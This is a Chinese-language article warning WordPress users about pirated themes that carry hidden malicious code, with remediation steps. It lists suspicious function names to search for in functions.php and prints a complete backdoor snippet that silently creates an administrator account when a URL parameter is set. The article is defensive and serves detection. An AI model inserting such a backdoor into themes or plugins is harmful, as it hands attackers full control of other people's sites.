wordpress越來越強大,也伴隨著出現越來越多的主題,除了有大量官方的主題,也有許多主題設計者發布收費主題和免費主題,很多不良人收集各種主題回來測試然后添加暗鏈�、廣告�,甚至惡意代碼,然后免費或者收費公開發布出去,誘使別人下載使用,達到不可告人的目的,對不懂代碼的童鞋來說,那是致命的.
怎么才知道自己的主題感染了惡意代碼呢���?
換主題經常出錯提示“Fatal error: Cannot redeclare _check_isactive_widget()”�����、”_get_allwidgetcont” 之類的那么很有可能你已經被感染了���,而且在你換主題的時候還會復制惡意代碼到你的新主題里去��。如果出現了黑鏈�����、陌生鏈接和不明廣告,很可能就是主題存在惡意代碼!
都去檢查一下functions.php文件查一下是否有以下代碼��,如果你的functions.php中有以下任意一段代碼����,那么你可能就中招了。
- add_action(“admin_head”,
-
- add_action(“init”, “_getprepare_widget”);
下面幾個是常見的惡意代碼:
- _verify_isactivate_widgets
-
- _check_isactive_widget
-
- _get_allwidgetscont
-
- _prepare_widgets
-
- __popular_posts
新增一段代碼開頭含有:
_verifyactivate_widgets
_verifyactivate_widget
下面的代碼更加狠,可以自動添加一個角色為管理員的用戶.
- add_action('wp_head', 'holeinthewall');
- function holeinthewall() {
- If ($_GET['backdoor'] == 'go') {
- require('wp-includes/registration.php');
- If (!username_exists('username')) {
- $user_id = wp_create_user('username', 'password');
- $user = new WP_User($user_id);
- $user->set_role('administrator');
- }
- }
- }
將代碼添加到您當前主題的 functions.php 文件或插件中,會自動創建一個用戶名:username 密碼:password的有管理員權限的用戶,之后想做什么都可以了,這些惡意代碼被添加后,主題看不出任意異常,只有在functions.php檢查才能發現,防不勝防!所以大家盡量到官方或原始發布站點下載主題,少用盜版主題和插件以免被開了后門也不知曉.
解決辦法:
1、如果是主題本身自帶的惡意代碼就去原發布地址下載主題重新安裝,官方的和原發布地址的百分之90是不會有惡意代碼的.
2、如果是感染了惡意代碼的找到functions.php 文件用原文件替換掉
3�、刪除惡意代碼,一般就是以上任意一段代碼之后的所有代碼,這段代碼前面還有一個<?PHP,一起刪掉.
